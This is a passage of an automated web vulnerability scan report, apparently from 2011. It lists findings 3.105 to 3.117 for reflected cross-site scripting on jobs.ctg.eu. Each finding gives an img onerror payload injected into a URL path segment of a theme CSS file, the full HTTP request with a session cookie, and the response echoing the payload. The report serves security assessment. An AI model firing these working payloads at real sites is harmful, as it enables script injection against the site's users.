The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbdf4"><img%20src%3da%20onerror%3dalert(1)>a2669574242 was submitted in the REST URL parameter 6. This input was echoed as bbdf4"><img src=a onerror=alert(1)>a2669574242 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css/content.cssbbdf4"><img%20src%3da%20onerror%3dalert(1)>a2669574242?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:43:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:43:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css-content.cssbbdf4"><img src=a onerror=alert(1)>a2669574242 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.105. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/forms.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f83c"><img%20src%3da%20onerror%3dalert(1)>e267de7cab0 was submitted in the REST URL parameter 1. This input was echoed as 9f83c"><img src=a onerror=alert(1)>e267de7cab0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites9f83c"><img%20src%3da%20onerror%3dalert(1)>e267de7cab0/all/themes/threesixty/css/forms.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites9f83c"><img src=a onerror=alert(1)>e267de7cab0-all-themes-threesixty-css-forms.css not-front not-logged-in page-sites9f83cimg-srca-onerroralert1e267de7cab0 no-sidebars">
...[SNIP]...

3.106. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/forms.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6659a"><img%20src%3da%20onerror%3dalert(1)>dbe43d36086 was submitted in the REST URL parameter 2. This input was echoed as 6659a"><img src=a onerror=alert(1)>dbe43d36086 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all6659a"><img%20src%3da%20onerror%3dalert(1)>dbe43d36086/themes/threesixty/css/forms.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:35:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:35:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all6659a"><img src=a onerror=alert(1)>dbe43d36086-themes-threesixty-css-forms.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.107. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/forms.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e923"><img%20src%3da%20onerror%3dalert(1)>8929cc0ff82 was submitted in the REST URL parameter 3. This input was echoed as 4e923"><img src=a onerror=alert(1)>8929cc0ff82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes4e923"><img%20src%3da%20onerror%3dalert(1)>8929cc0ff82/threesixty/css/forms.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes4e923"><img src=a onerror=alert(1)>8929cc0ff82-threesixty-css-forms.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.108. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/forms.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ee0"><img%20src%3da%20onerror%3dalert(1)>a0e58f3bd20 was submitted in the REST URL parameter 4. This input was echoed as 66ee0"><img src=a onerror=alert(1)>a0e58f3bd20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty66ee0"><img%20src%3da%20onerror%3dalert(1)>a0e58f3bd20/css/forms.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty66ee0"><img src=a onerror=alert(1)>a0e58f3bd20-css-forms.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.109. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/forms.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d1d8"><img%20src%3da%20onerror%3dalert(1)>7d59f35fcff was submitted in the REST URL parameter 5. This input was echoed as 3d1d8"><img src=a onerror=alert(1)>7d59f35fcff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css3d1d8"><img%20src%3da%20onerror%3dalert(1)>7d59f35fcff/forms.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css3d1d8"><img src=a onerror=alert(1)>7d59f35fcff-forms.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.110. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/forms.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de084"><img%20src%3da%20onerror%3dalert(1)>bada0a754ce was submitted in the REST URL parameter 6. This input was echoed as de084"><img src=a onerror=alert(1)>bada0a754ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css/forms.cssde084"><img%20src%3da%20onerror%3dalert(1)>bada0a754ce?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css-forms.cssde084"><img src=a onerror=alert(1)>bada0a754ce not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.111. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/reset.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 472d7"><img%20src%3da%20onerror%3dalert(1)>d21d98c0b71 was submitted in the REST URL parameter 1. This input was echoed as 472d7"><img src=a onerror=alert(1)>d21d98c0b71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites472d7"><img%20src%3da%20onerror%3dalert(1)>d21d98c0b71/all/themes/threesixty/css/reset.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites472d7"><img src=a onerror=alert(1)>d21d98c0b71-all-themes-threesixty-css-reset.css not-front not-logged-in page-sites472d7img-srca-onerroralert1d21d98c0b71 no-sidebars">
...[SNIP]...

3.112. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/reset.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1609"><img%20src%3da%20onerror%3dalert(1)>bb347cd22fb was submitted in the REST URL parameter 2. This input was echoed as e1609"><img src=a onerror=alert(1)>bb347cd22fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/alle1609"><img%20src%3da%20onerror%3dalert(1)>bb347cd22fb/themes/threesixty/css/reset.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:35:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:35:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-alle1609"><img src=a onerror=alert(1)>bb347cd22fb-themes-threesixty-css-reset.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.113. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/reset.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40e93"><img%20src%3da%20onerror%3dalert(1)>6c4bd4ba80 was submitted in the REST URL parameter 3. This input was echoed as 40e93"><img src=a onerror=alert(1)>6c4bd4ba80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes40e93"><img%20src%3da%20onerror%3dalert(1)>6c4bd4ba80/threesixty/css/reset.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes40e93"><img src=a onerror=alert(1)>6c4bd4ba80-threesixty-css-reset.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.114. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/reset.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d35f"><img%20src%3da%20onerror%3dalert(1)>7f3d9831ebc was submitted in the REST URL parameter 4. This input was echoed as 4d35f"><img src=a onerror=alert(1)>7f3d9831ebc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty4d35f"><img%20src%3da%20onerror%3dalert(1)>7f3d9831ebc/css/reset.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty4d35f"><img src=a onerror=alert(1)>7f3d9831ebc-css-reset.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.115. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/reset.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d36f"><img%20src%3da%20onerror%3dalert(1)>c1408102547 was submitted in the REST URL parameter 5. This input was echoed as 4d36f"><img src=a onerror=alert(1)>c1408102547 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css4d36f"><img%20src%3da%20onerror%3dalert(1)>c1408102547/reset.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css4d36f"><img src=a onerror=alert(1)>c1408102547-reset.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.116. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/reset.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8cff"><img%20src%3da%20onerror%3dalert(1)>6a1e3159388 was submitted in the REST URL parameter 6. This input was echoed as d8cff"><img src=a onerror=alert(1)>6a1e3159388 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css/reset.cssd8cff"><img%20src%3da%20onerror%3dalert(1)>6a1e3159388?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css-reset.cssd8cff"><img src=a onerror=alert(1)>6a1e3159388 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.117. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/structure.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 115eb"><img%20src%3da%20onerror%3dalert(1)>d9768e149d1 was submitted in the REST URL parameter 1. This input was echoed as 115eb"><img src=a onerror=alert(1)>d9768e149d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

